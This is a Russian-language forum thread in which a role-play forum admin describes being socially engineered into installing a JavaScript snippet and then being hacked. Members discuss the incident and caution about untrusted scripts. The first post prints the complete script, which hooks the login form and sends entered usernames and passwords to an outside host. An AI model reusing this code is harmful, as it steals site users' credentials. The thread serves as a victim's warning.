Сентябрьский Лис: [Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп. 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт: <script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script> Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика) Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров. Разговоры на форуме "Критик" до взлома моего форума: После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше. "У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота. Комментарий специалиста: [quote]Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"[/quote]
Сентябрьский Лис: Надо отметить, что этот взломщик, отлично справился с женской ролью. Это к слову о "Мужчинах, играющих женщин". Он очень долго разговаривал со мной в ЛС: ну такая девочка-припевочка! Blazing Wizard лопнул бы от зависти. Взломщик чуть ли не в любви мне в ЛС объяснялся. Жаль, что ЛС не сохранились - он, проникнув на форум, естественно, всё стёр. И аватар у него был такой сексапильный: такая розовенькая девочка с выпирающими из декольте грудями )))))
Sem: Сентябрьский Лис пишет: ну такая девочка-припевочка Наверняка шаблонная блондинка и губки бантиком.
Сентябрьский Лис: Вроде того!
Norsefire: Вот так и ловят людей на их слабостях и предрасположенностях! :) А все потому, что честь по чести ничего противопоставить не могут. Скучища, господа. Лис, выше нос - уроды остаются уродами и в Африке, а форуму от этого идиотизма ничего не сделается.
McNamara: Лис попался на том, о чём сам писал в теме "Женщины, играющие мужчин": "Что хочет женщина - никому неизвестно, а мужчина как раз хочет её... то есть, женщину". Теперь серьёзно: Лис хочет выложить всю историю взлома со всеми доказательствами, скриптами и скриншотами. Как Вы считаете? Это безумная идея? Рассвирепеют взломщики, рассвирепеет администрация Борды? Форум хакнут окончательно? (Нужное подчеркнуть). PS. Буду только вечером.((
Sem: А можно свой вариант? Может просто спокойно себе жить дальше? Взломщики должны любить внимание, а если их игнорить... может сами заскучают и испарятся?
Norsefire: Взломщикам это только понравится. Администрация борды даже не обратит внимания, поскольку взлом был сделан не через уязвимости борды, а через уязвимости админа. Хакнут ли окончательно? Не знаю...
Сентябрьский Лис: Кстати, а профиль Соло тоже удалили? Нет. Вернее удалил не взломщик, а я по её просьбе. Она пришла, увидела, что форум взломан и не захотела здесь больше оставаться. Попросила удалить свой профиль. Я знаю, что в некоторые моменты с ней лучше не спорить Solo такой человек... Человек неожиданных решений и ни на кого не ориентирующегося собственного мнения. Если она захочет уйти - её ничто не удержит. Пример: http://rollers.fastbb.ru/?1-5-0-00000008-000-0-0#005 (Там была как раз та самая "криминальная статья") Norsefire Я вашу последнюю строчку убрал. Не надо такими словами разбрасываться - вдруг у них на критике что-то случится, а обвинят вас. (Если бы эти критики-кретины не стали в открытую обо всём говорить на своём форуме - фиг бы я догадался откуда ветер дует )
Norsefire: Сентябрьский Лис, спасибо за заботу, но это лишнее :))) Что же теперь, сидеть, бояться и не рисковать криво посмотреть в чью-то сторону, потому как хакнут-заспамят аську глупостями-постучаться головой о стенку и напишут заявление в милицию? Получается какой-то форпост в окружении Дивного Нового Мира. Баба Яга против :))))))) По поводу Solo - очень жаль, действительно.
Мэгги: Norsefire К сожалению, от взломов никто не застрахован, меня просто удивляет наглость этих ребят, которые ещё и в открытую это признают.
Norsefire: Мэгги, ну так если им нечем гордится из сферы созидательного - значит, приходится гордится деяниями из серии "приумножим энтропию". Самоутверждаться ж как-то надо. Только, я думаю, совершенно не стоит идти на поводу у их самоутверждения. А то еще возомнят себе, что их боятся...
McNamara: После подписи этого нашего красавца, думаю, стоит всякие темы на эту тему прекратить. А то действительно начнёт воображать, что добился своего. Дураку ведь только дай повод - он апстенку биться начнёт.
Сентябрьский Лис: Norsefire пишет: По поводу Solo - очень жаль, действительно. Что поделаешь, Solo, как кошка - гуляет сама по себе. Захочет - вернётся. Norsefire пишет: идеть, бояться и не рисковать криво посмотреть... и т.д. Нет. Но я категорически против призывов ко взлому. Во всяком случае, это первое, что меня оттолкнуло в Критике, когда я его первый раз увидел.
Линнда Палпатин: Давайте лишний раз воздадим должное Case: значит, действительно его форумы так трудно взломать, что можно только обманом подлизаться к админу. А от обмана никто не застрахован. Обмануть можно и умного, и глупого. Но только дурак будет кичиться тем, что кого-то обманул.
Сентябрьский Лис: Блин! Критику никак не успокоиться! Они опять припёрлись. Ещё и порекомендовали свой баннер установить! А на баннере что написано: "Лучший форум по взлому лохов"? Однако, хорошо, что у меня премодерация стоит! А Solo - как хочет, пускай так и пишет, если не хочет регистрироваться
Norsefire: Сентябрьский Лис, дети, ну что с них взять-то, кроме анализов?..
McNamara: Их наверное так свербит, что никто к ним не пришёл Проникаюсь чувством жалости: бе-е-е-едненькие!
Zenitchik: Изучил тему. Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале. На счет взлома: то, что у Кота Бегемота начался маразм - не повод гнать всех критиков под одну гребенку. Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой... Я на Ролес провокаторов прищемил бы раньше.
McNamara: Zenitchik А кто их просил этой ихней критики? Пусть оценивают того, кому это надо. По крайней мере, Ролес, на сколько я понял, не занимается оценкой чьих бы то ни было форумов, не спрося хозяев.
Zenitchik: А Критик - занимается. Я не вижу в этом ничего плохого.
Сентябрьский Лис: Дорогой Zenitchik! Фразу о том, что у кого-то на "Лисе" друзья - мне, конечно, чисто по-человечески, было приятно слышать - но это не аргумент! У каждого форума есть: Цели. Задачи. Актуальность его в данный момент. Для более продвинутых форумов, типа Вашего Ролес, который претендует на исследователльскую работу, можно ввести ещё категории: Объект исследования. Предмет исследования. Гипотеза. Медология и методика исследования. Но первые три тункта (верхние) обязательны для любого форума, пусть даже это форум по ГП. Цель данного форума - реклама ролевых игр. - Выполняется? Насколько? Задача даного форума - размещение шаблонной рекламы, размешение рекламных баннеров. Далее оценка: Насколько хорошо скомпанованы рекламные разделы, удобно ли в них читать рекламу. Удобно ли размещены баннеры для пользования ими клиентами? Актуальность: Игровые форумы нуждаются в рекламе? Может на рынке переизбыток таких рекламных форумов? И т.д. Вот это - оценка! А "оценка" - «у них слишком много баннеров» - это не оценка. Форум создан для размещения баннеров. Если их мало, значит задачи форума не выполняются. Поэтому и дизайн я пытался сделать максимально лёгким - потому что его неминуемо будут утяжелять баннеры (почему я и не оставил диз "Зеленое озеро" - для такого форума он был тяжеловат) А то что они говорят - это просто легкомысленная беседа ни о чём.
Sem: Zenitchik пишет: не вижу в этом ничего плохого А я вижу. Зачем идти туда, куда не приглашали и еще и навязывать свое мнение? Как говорится, в чужой монастырь со своим уставом не ходят.
McNamara: Sem пишет: Зачем идти туда, куда не приглашали и еще и навязывать свое мнение? Думаю, в случае с Критиком всё просто: идут они потому, что иначе до них мало кому дело есть. А выпендриться хочется. Дети же)). И не говорите мне, что не дети. Были бы взрослее - вели бы себя серьёзнее, чем таскаться по чужим форумам, а потом не знать, как бы так заманить к себе админа, чтобы он на них внимание обратил. А кому это надо? Да я 100 % даю, что если бы они Ролес не боялись, они бы и про него фиг знает чего говорили и фиг бы поставили в свой зал почёта. Я одни названия их разделов почитал - уже всё понял, закрыл и больше не открывал. Детский сад - младшая группа.
Сентябрьский Лис: Кажется к нам пришёл Бегемот! Вероятно с помощью "Hide IP platinum" или чего-то вроде того, т.к. IP анонимный Из премодерации: «Взломщиком удалены часть реклам РИ, часть баннеров» шозанах, какие банеры? Тянет, беднягу на место преступления. Он думает, я поверю, что баннеры сами испарились.
Zenitchik: Они? Боялись Ролес? Вы, наверно, шутите! Мы появились, как их смягченная форма! Конечно, с тех пор многое изменилось, но наследник ПОЗОРа - страшнее нас по определению. Хотя, они свой авторитет здорово подорвали в последнее время. ИМХО, именно отсутствием "тормоза".
Сентябрьский Лис: Zenitchik пишет: Они? Боялись Ролес? Вы, наверно, шутите! Мы появились, как их смягченная форма! Zenitchik! Вы меня простите за такой грубый комплемент, но вы (Ролес) - гораздо умнее их и они это понимают. А кто умнее - тот страшнее.
Мэгги: Zenitchik пишет: Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале. Zenitchik Представьте, подходят к вас детишки из детского сада и говорят: "Знаешь, дядя, мы щас тя оценивать будем". Блеск! Ну, я понимаю критиков, они так самоутверждаются. Но вы-то, взрослый человек!.. Ещё скажите, что вы их боитесь.
Zenitchik: Я не боюсь Критиков не потому. Дело в том, что у меня там все свои. Мне тут предлагали забыть, свое ПОЗОРное прошлое, но как можно забыть то, о чем ностальгируешь? У меня на Ролес работали одно время "динозавры" ПОЗОРа - Рунира и Плинер. А Критик - так, вялый аналог. Больно видеть как он деградировал после того, как половина толковых людей откололась...
Zenitchik: Кстати, мы одно время Критик в качестве пугала использовали ))) Типа, тех, кто у нас в каталоге мы от них прикроем ))) После раскола на Критике - пугала не стало. UPD: Пардон за мультипостинг. В ФФ ужасно неудобно по сравнению с MyIE реализована многооконность.
Сентябрьский Лис: Хм... Если бы все относились к kritik, так как я - его бы давно уже не было. Я кстати, тоже не совсем правильно отнёсся: не надо было о взломе ничего писать. Но я уже всё убрал! Zenitchik пишет: Пардон за мультипостинг. Можешь не извиняться. На это я смотрю сквозь пальцы...
Solo: Zenitchik пишет: Вас там оценили как "средний" ресурс. Это вполне достоиная оценка по ихней шкале. Просто у них комплекс вины теперь. Они же не окончательные кретины. Голова-то всё же есть на плечах, понимают, что вот так просто "ни за что не про что" взломали чужой форум (который сами же взялись оценивать), ради собственного удовольствия. Вернее один взломал, а остальные с этим согласились. Теперь чувствуют себя виноватыми. Прям, нужна их оценка кому-то.
McNamara: Solo Из оценка нужна прежде всего им самим. А то получается, что они у себя на своём Критике занимаются фигнёй. А так, оценил кого-то - сделал себе приятное. Если бы Лис пришёл с ними ругаться - им была бы радость. А Лис не пришёл (хороший мальчик). Тогда они стали его ругать, в надежде, что не выдержит. А потом поняли, что бесполезно - решили другим манером и похвалили вроде бы. Да я их понимаю, ну хочется людям, чтобы к ним шли. Я бы пошёл, попробовал объяснить, что не такими методами к себе заманивать надо. Да и то сказать, у них достаточно народу, чтобы беспокоиться из-за нехватки. Только боюсь, всё равно не поймут. Потому не пойду.
Norsefire: McNamara, да вряд ли. Посещаемость у форума высокая - как и у любого ресурса подобной направленности. Так что это просто и банально сублимирование комплексов.
Кеяру: Zenitchik пишет: Почитайте обсуждение и сами убедитесь: критиковали справедливо и даже довольно мягко. Хотя, порядок у них на форуме не мой... Фу, какая грязь, как низко: никакой этики и банального человеческого уважения. Критика критике рознь. Есть критика конструктивная, когда высказывают пожелания по улучшению, а есть деструктивная критика, направленная на втаптывание в грязь и утеху собственного самолюбия. Хоть я и фактически ещё не являюсь участником коллектива вашего форума, и, может, я не совсем в теме событий, но на мой взгляд, эти люди совсем не то авторитетное мнение, которое стоит слушать. Сентябрьскому Лису, мой личный поклон, а после прочитанного на Критике, уважение к вам и вашему ресурсу у меня только повысились, хотя бы потому что вы держитесь достойно и вполне взросло, адекватно и как деловые люди, с вами приятно иметь дело. PS Я просто не могла смолчать.....
McNamara: Кеяру Пожимаю Вашу мужественную руку. И вполне считаю Вас участником данного форума. И более того, Вы во всём абсолютно правы. А критика всегда должна быть конструктивной. Иначе это не критика, а ругательство.
Кеяру: McNamara, благодарю Так что, "всех в топку - мы супер!"
Сентябрьский Лис: Кеяру пишет: Сентябрьскому Лису... и т.д. Кеяру Спаисбо!
Сентябрьский Лис: Кстати, зря я говорил о том, что Бегемот поступил достаточно благородно, навредив форуму после взлома не в полную силу. Всё-таки грохнул он у меня одну тему о проблемных игроках. Там была статья Мэгги (ещё под ником Линнда Палпатин) о проблемных игроках. Я перекопал весь форум, пересмотрел по несколько раз те темы в которых эта статья потенциально могла быть (а на это ушло несколько дней), после меня всё перекопала Мэгги. Статьи точно нет. А ссылка а неё в одном из сообщений http://septemberfox.forum24.ru/?1-2-0-00000027-000-0-0#006 ведёт в совершенно левую тему и указывает на совершенно левое сообщение. (При перемещении тем на форумах Borda их адреса теряются, вернее начинают указывать на другую тему, которая стоит на месте старой. На Ucoz при перемещении темы в другой раздел ссылка всё равно приводит именно на нужную ему. Однако, мы говорим не о UcoZ'е сейчас). Короче, тема со статьёй всё таки была удалена, вероятно, "за компанию". Взлом есть взлом.
Аскер: Просмотрела все в легком шоке, если честно. Даже прокомментировать не знаю как лучше... В общем, ужас да и только... Век бы у взломщика руки горчицей были намазаны...
Аскер: Ой, от шока даже запамятовала поблагодарить Лиса за столь ценную информацию. Теперь будем знать о данном скрипте. Хотя, я бы ни при каких условиях не согласилась к себе на сайт поставить что-то с чужих рук. Не на таких горбатились, не для таких делаем уступки...
Сентябрьский Лис: Да нет, как я уже говорил, в общем-то взломщик мог бы вообще всё снести нафиг, т.е. весь форум, но он этого не сделал. Правда case может полностью восстановить уничтоженный форум т.к. у него остаётся резервная копия всех форумов Borda (кстати, о borda. Насколько я знаю, больше ни один сервис такой услуги юзерам не предлагает). Но Бегемот (взломщик) поступил достаточно деликатно, почти все темы оставив на месте.
Аскер: Да уж, очень деликатно... Спасибо и на этом, конечно. Но лучше бы он вообще свои руки не совал куда не следует.
Solo: На форуме техподдержки у case в разделе "Свободное общение" есть тема "Форумы хакерской тематики". Зачем она там – объяснено в первом сообщении. Форумы, указанные в начале темы уже удалены. Но часть форумов существует. Например, тот, что указан в сообщении от 01.08.08. Когда есть время, я захожу на такие форумы. После случая с форумом Лиса я сама убедилась, что от взлома никто не гарантирован. Я хожу и смотрю, чего можно ожидать, на что не нужно попадаться, что вообще, потенциально может случиться. Ведь и форум Лиса взломали от недостатка знаний самого Лиса и его излишней доверчивости. Я умышленно не сообщаю адресов форумов и тем. Кому надо, тот сам сходит и посмотрит. Более всего меня впечатлила тема "Угон мыла". Речь идёт об Яндексовских ящиках. Можно, конечно, проще выйти из положения – не заводить ящик на Яндексе. Но тут такая загвоздка, когда регистрируешь сайт на Народе.ру к сайту автоматически прилагается ящик. И ящик автоматически получается с тем же паролем, что и логин на Яндексе. Если сменить пароль на ящике – он автоматически меняется и на Народе, они взаимосвязаны. Получается, что взломав ящик, хакер спокойно получает и доступ к моему сайту. По свидетельству других членов форума указанным способом взломать ящик получается раз на 6-7-8. Нужно только проявить терпение... В общем, другой какой-то хостинг надо искать.
Сентябрьский Лис: Психология взлома Мне захотелось подумать о том, какие мотивы могут руководить взломщиками. Насколько я понимаю, часто действует вовсе не желание навредить какому-нибудь конкретному сайтовладельцу (хотя и такое тоже бывает), тут немалое имеет место желание вступить в борьбу с защитной системой ящиков или сервисов. Вероятно, это воспринимается, как игра: "вот я вступаю в борьбу с защитной системой - смогу ли я её победить?!" При этом обычный юзер, у которого ломают ящик - это просто расходный материал, подопытный кролик. Для того, чтобы сразиться с Яндексом - нужен ведь чей-то ящик. Получается, что взломщик - это игрок. Вот только играет он в другие игры. Вот например эта ситуация, приведённая в первом посте темы. Бегемоту было совершенно нечего делить со мной. Мы вообще не знали друг друга. Мотивом его деятельности был интерес: сработает-не сработает? Периодически видишь картину: сайт/форум взломан, и так и остаётся висеть с перекошенным дизайном и надписью хакера. И висеть он так может достаточно долго. Хозяин почему-то не обращается за помощью к тому же case, чтобы восстановил пароль и темы форума. Почему - не знаю, но могу сказать за себя. Когда "Лиса" взломали, мне стало пофиг. "Баба с возу - кобыле легче" - одним форумом меньше, тем более, что все наиболее ценные статьи форума были скопированы у меня в компьютер. Форум тоже висел целый день с приветствием Бегемота на самом видном месте. Мне действительно было пофиг и я не собирался его восстанавливать. Более всего обеспокоены происходящим были Мэгги и сам Бегемот, который в течение дня несколько раз появлялся и писал всякую чушь, смысл которой можно было перевести так: "Чё это вы сидите и ничего не делаете?" Вечером мне в конце концов стало жалко народ, который очень переживал и ломился в аску к Мэгги и Макнамары (ко мне никто не ломился, потому что я аську не включал) и я отдал Маку ГПФ и он уже там сам всё менял и восстанавливал. Вообще, любой сайтовладелец должен быть готов к тому, что в любой момент можно всё потерять. Поэтому нужно всё по максимуму хранить у себя в компьютере (или на диске): коды, фотографии, тексты. Например, если хакнут новеллизацию - я восстановлю её в течении получаса. Нужно только загрузить готовые страницы с компьютера и поменять на них адреса... P.S. А с Народа, действительно лучше бы свалить, в какое-нибудь более надёжное место...
Gabi Kaufmann: Сентябрьский Лис пишет: 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Теперь я понимаю, почему здесь так не любят джава-скрипты)). Мне в этом деле повезло (ттт., чтоб не сглазить.) Я познакомилась с мальчиком, школьником, который прекрасно разбирается в джава скриптах и имеет несколько форумов с отличной посещаемостью (поэтому для взлома ему моя ролевая не интересна, более того, он даже не понимает, что такое ролевые, и с чем их едят.Парень любит контер страйк и иже с ними.Все мои попытки научить его писать посты с треском провалились.) Но мы с ним поладили, нашли общий язык.Я оценила его скрипты, а он стал помогать мне с ролевой.Конечно, на ролевой еще масса недоработок, но этот парень мне очень помог (и надеюсь, будет помогать в дальнейшем.) Даже рассказал про скрипты взлома, и какую угрозу они несут.А то я в этом деле полный лузер.))
Сентябрьский Лис: Gabi Kaufmann пишет: Даже рассказал про скрипты взлома, и какую угрозу они несут. Вы нас, случайно не просветите по этому вопросу? Полезная информация, между прочим!
Gabi Kaufmann: Сентябрьский Лис пишет: Вы нас, случайно не просветите по этому вопросу? Полезная информация, между прочим! Что именно вам хочется узнать? Я всего уже не припомню.Вы пишите вопросы, я как Кирилла поймаю, так спрошу, сохраню в ворде-и сюда кину)).
Сентябрьский Лис: Gabi Kaufmann пишет: Что именно вам хочется узнать? Я всего уже не припомню. Ну, я не взломщик, чтобы конкретно спрашивать. Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя. А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java!
Gabi Kaufmann: Сентябрьский Лис пишет: Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя. Не думаю, что Кирилл сможет назвать вам конкретные коды, которые ставить нельзя)).Новые же придумывают каждый день)).Может только самые известные назовет, например те, которые вышибают всех админов. Сентябрьский Лис пишет: А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java! Золотые слова.Мне так Кирилл и сказал:"Оля, если не понимаешь скрипт-даже не дотрагивайся.")) И дал ссылку для восстановления сайта, если что случиться вдруг.
Миледи2: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов.
Gabi Kaufmann: Миледи2 пишет: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов. Слишком жестко)).Так можно нажить много забанненых врагов, которые будут засыпать форум спамом, заходить под другим айпи и старательно вредить (тем более ломают форумы в основном дети.Что-то я не припомню на своей практике взрослых людей, которые были бы заинтересованы во взломе чужой ролевой.Ведь денег они с этого не получат, а создать свою ролевую взрослый человек может и покруче, чем у кого-то.А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)). Тем более, подростки довольно злопамятны.
Beastmaster: Gabi Kaufmann вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую. Миледи2 пишет: Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов. Воистину, лучше таких долой.
Gabi Kaufmann: Beastmaster пишет: Воистину, лучше таких долой. Думаю, меня бы тут давно забанили, если бы прислушивались к вашему правилу)).Я в одной темке очень радела за джава-скрипты)). Beastmaster пишет: вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую. Не вы ли хотели составить черный список, не ваш-ли форум замучили такие уроды?)) Вот потому и замучили, они все отомстить вам пытаются, а не выходит никак)).
Beastmaster: Gabi Kaufmann ой да на здравие, пусть пытаются. На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления. А идея была после того, как на форуме моей хорошей знакомой один "обиженный" снёс все настройки. Я тогда срочно бросил все дела и полез восстанавливать ей проект. Вот такие люди, ИМХО, опасны. Вот и решил посоветоваться- а есть ли смысл? Да и вы как, навязывали скрипты, убеждали поставить и т.д.?
Gabi Kaufmann: Beastmaster пишет: Да и вы как, навязывали скрипты, убеждали поставить и т.д.? Не убеждала конечно, но активно пропагандировала что они полезны, и можно сказать навязывала всем свою точку зрения)). Beastmaster пишет: Вот и решил посоветоваться- а есть ли смысл? Ну знаете, это как в переговорах с террористами.Можно сразу провести зачистку и всех уничтожить, и террористов, и невинных людей, которые случайно попали под обстрел, а можно провести переговоры. Не даром есть военные психологи и тд.))
Сентябрьский Лис: Gabi Kaufmann пишет: тем более ломают форумы в основном дети. Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку ) Gabi Kaufmann пишет: Так можно нажить много забанненых врагов, которые будут засыпать форум спамом Так Вы поставьте красный уровень защиты. Gabi Kaufmann пишет: А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)). Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы) Gabi Kaufmann пишет: Тем более, подростки довольно злопамятны. Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!)))) Gabi Kaufmann пишет: Думаю, меня бы тут давно забанили Gabi Kaufmann, на этом форуме никто ни от чего не гарантирован! Beastmaster пишет: На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления. Меня тоже одно время так рекламили! Или почти так.
Gabi Kaufmann: Сентябрьский Лис пишет: Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!)))) Изумительный случай детской непосредственности при кризисе среднего возраста. Сентябрьский Лис пишет: Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Сентябрьский Лис пишет: на этом форуме никто ни от чего не гарантирован! Вы на что намекаете? Сентябрьский Лис пишет: Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы) Они и не такое умеют)).Просто, уж извините меня, взрослые хакеры будут взламывать счета банков а уж никак не ролевые игры.Хосподи, кому они нужны. Сентябрьский Лис пишет: Так Вы поставьте красный уровень защиты. Мой форум (ттт), никто спамом не засыпает.
Сентябрьский Лис: Gabi Kaufmann пишет: Изумительный случай детской непосредственности при кризисе среднего возраста. У кого? У меня? Gabi Kaufmann пишет: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Давайте! С удовольствием послушаю! Gabi Kaufmann пишет: Вы на что намекаете? Я ни на что не намекаю. Я всё прямо говорю: "Никто ни от чего не гарантирован!"
Gabi Kaufmann: Сентябрьский Лис пишет: У кого? У меня? Сентябрьский Лис пишет: Давайте! С удовольствием послушаю! Лис, не злитесь, я говорила вовсе не про вас, а про взломщиков, которые завидуют чужим успехам. И никто не говорит-что дети киборги и от них надо прятаться под кроватью.Просто порой здравый диалог полезнее бана, вот о чем я... Сентябрьский Лис пишет: Я ни на что не намекаю. Я всё прямо говорю: "Никто ни от чего не гарантирован!" Посему я не буду флудить и придавать вам лишнюю работу)). Свою мысль о взломщиках я высказала, добавить мне нечего.
Сентябрьский Лис: Gabi Kaufmann пишет: Лис, не злитесь, Вы что?! Я не злюсь! Просто насколько я знаю, форум borda самый неуязвимых для взломов из всех подобных сервисов. Реально. Мне бы хотелось услышать реальный рассказ, как его удалось кому-то взломать, тем более ребёнку. Он в принципе не ломается. Потому и конкурентоспособен среди остальных (т.к. других минусов у него достаточно много) Я лично думаю, что Вы просто прихвастнули и на самом деле не знаете ни одного реального случая, когда бы дети взламывали Борду. Если я не прав - докажите.
Миледи2: Gabi Kaufmann На Борде есть красный уровень. Спамят лишь там, где нет премодерации. Я как-то давно забанила таких детей, и да, они понаписали на форуме гадостей. Вычистила, поставила премод, и больше я их не видела. Сентябрьский Лис Не надо доказывать. Вы правы. Борда - это не мибб какой-нибудь. Разбанить тут нельзя. И спам через премод не пройдет, если только сам админ сослепу не пропустит.
Gabi Kaufmann: Миледи2 пишет: не мибб какой-нибудь А зачем майбб оскорблять? Я борду не оскорбляла. Взломать могут любой форум на любом сервисе, и дети, и не дети.
Gabi Kaufmann: Сентябрьский Лис пишет: что Вы просто прихвастнули Вы намекаете что я ребенок и круглыми днями ломаю борду?)) Сентябрьский Лис пишет: Если я не прав - докажите. Уж извините, айпи этих детей у меня нет, но по-поведению это были либо подростки, либо крайне непосредственные неуравновешенные люди.))
Миледи2: Beastmaster пишет: Да и вы как, навязывали скрипты, убеждали поставить и т.д.? НИКОГДА. Есть только один человек, которому я доверяю в смысле скриптов - Norm Iridium. И там никто никому ничего не навязывает и не уговаривает. Нужен на ЦАТПе скрипт - берите сами. Если кто-то вас уговаривает - уже плохой признак. Не надо никого убеждать, люди сами решат, что им надо.
Gabi Kaufmann: Миледи2 пишет: НИКОГДА. Есть только один человек, которому я доверяю в смысле скриптов - Norm Iridium. И там никто никому ничего не навязывает и не уговаривает. Нужен на ЦАТПе скрипт - берите сами. Если кто-то вас уговаривает - уже плохой признак. Не надо никого убеждать, люди сами решат, что им надо. Согласна.Если скрипт навязывают-это ненормально.
Миледи2: Gabi Kaufmann Простите, невольно плохо выразилась.
Gabi Kaufmann: Сентябрьский Лис Я все-же задала ваш вопрос знакомому, можно ли как-то отличить "нехороший" скрипт от нормального. Жду теперь его ответа)).
Wanderer: Сентябрьский Лис пишет: И вообще, самое надёжное - голый html: чтоб никаких php и java! PHP такой же язык как и HTML. На нём работают многие форумы (я сейчас не о бесплатных хостингах под ролы, а вобще о форумах). Другое дело, когда вы на свой "голый html" пихаете что-то с PHP - вот тогда да. Ну а java - всегда были подозрительными, да.
